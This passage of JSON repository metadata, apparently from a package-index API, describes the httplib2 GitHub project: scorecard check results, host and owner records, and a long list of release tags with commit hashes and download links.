artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1